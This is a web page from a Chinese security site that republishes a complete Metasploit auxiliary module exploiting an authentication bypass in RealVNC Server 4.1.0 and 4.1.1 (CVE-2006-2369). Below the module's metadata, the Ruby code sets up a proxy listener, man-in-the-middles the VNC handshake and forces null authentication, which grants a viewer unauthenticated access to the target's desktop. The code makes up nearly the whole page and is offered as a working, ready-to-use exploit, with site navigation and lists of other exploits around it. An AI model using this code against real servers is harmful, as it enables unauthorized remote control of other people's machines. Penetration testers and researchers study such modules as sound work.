首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RealVNC Authentication Bypass
来源:http://www.metasploit.com 作者:hdm 发布时间:2011-08-29  

##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
 
 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'RealVNC Authentication Bypass',
   'Description'    => %q{
    This module exploits an Authentication Bypass Vulnerability
    in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
    listener on LPORT and proxies to the target server

    The AUTOVNC option requires that vncviewer be installed on
    the attacking machine. This option should be disabled for Pro
   },
   'Author'         =>
    [
     'hdm', #original msf2 module
     'TheLightCosine <thelightcosine[at]gmail.com>'
    ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 13641 $',
   'References'     =>
    [
     ['BID', '17978'],
     ['OSVDB', '25479'],
     ['URL', 'http://secunia.com/advisories/20107/'],
     ['CVE', 'CVE-2006-2369'],
    ],
   'DisclosureDate' => 'May 15 2006'))

  register_options(
   [
    OptAddress.new('RHOST', [true, 'The Target Host']),
    OptPort.new('RPORT',    [true, "The port the target VNC Server is listening on", 5900 ]),
    OptPort.new('LPORT',    [true, "The port the local VNC Proxy should listen on", 5900 ]),
    OptBool.new('AUTOVNC',  [true, "Automatically Launch vncviewer from this host", true])
   ], self.class)
 end

 def run
  #starts up the Listener Server
  print_status("starting listener")
  listener = Rex::Socket::TcpServer.create(
    'LocalHost' => '0.0.0.0',
    'LocalPort' => datastore['LPORT'],
    'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
   )

  #If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine
  #targetting the proxy listener.
  if (datastore['AUTOVNC'])
   unless (check_vncviewer())
    print_error("vncviewer does not appear to be installed, exiting!!!")
    return nil
   end
   print_status("Spawning viewer thread") 
   view = framework.threads.spawn("VncViewerWrapper", false) {
     system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
   }
  end

  #Establishes the connection between the viewier and the remote server
  client = listener.accept
  add_socket(client)

  s = Rex::Socket::Tcp.create(
    'PeerHost' => datastore['RHOST'],
    'PeerPort' => datastore['RPORT'],
    'Timeout' => 1
    )
  add_socket(s)
  serverhello = s.gets
  unless serverhello.include? "RFB 003.008"
   print_error("The VNCServer is not vulnerable")
   return
  end

  #MitM attack on the VNC Authentication Process
  client.puts(serverhello)
  clienthello = client.gets
  s.puts(clienthello)
  authmethods = s.recv(2)
  print_status("Auth Methods Recieved. Sending Null Authentication Option to Client")
  client.write("\x01\x01")
  client.recv(1)
  s.write("\x01")
  s.recv(4)
  client.write("\x00\x00\x00\x00")

  #handles remaining proxy operations between the two sockets
  closed = false
  while(closed == false)
   sockets =[]
   sockets << client
   sockets << s
   selected = select(sockets,nil,nil,0)
   #print_status ("Selected: #{selected.inspect}")
   unless selected.nil?
    if selected[0].include?(client)
     #print_status("Transfering from client to server")
     begin
      data = client.sysread(8192)
      if data.nil?
       print_error("Client Closed Connection")
       closed = true
      else
       s.write(data)
      end
     rescue
      print_error("Client Closed Connection") 
      closed = true
     end
    end
    if selected[0].include?(s)
     #print_status("Transfering from server to client")
     begin
      data = s.sysread(8192)
      if data.nil?
       print_error("Server Closed Connection")
       closed = true
      else
       client.write(data)
      end
     rescue
      closed = true
     end
    end
   end
  end

  #Garbage Collection
  s.close
  client.close
  print_status("Listener Closed")

  if (datastore['AUTOVNC'])
   view.kill
   print_status("Viewer Closed")
  end
 end

 def check_vncviewer
  vnc =
   Rex::FileUtils::find_full_path('vncviewer') ||
   Rex::FileUtils::find_full_path('vncviewer.exe')
  if (vnc)
   return true
  else
   return false
  end
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sunway Force Control SCADA 6.1
·Free MP3 CD Ripper 1.1 Local B
·Zortam Mp3 Center 3.50 memory
·Free MP3 CD Ripper 1.1 DEP Byp
·icoolplayer v1.0.1.0 memory co
·yahoo! player 1.5 (.m3u) Unive
·Zinf Media Player Local Buffer
·Mini FTP Server 1.1 Buffer Cor
·Groovy Media Player Version 2.
·Video Merge split Local Buffer
·Portable Saint Paint Studio Lo
·F-Secure Multiple Products Act
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved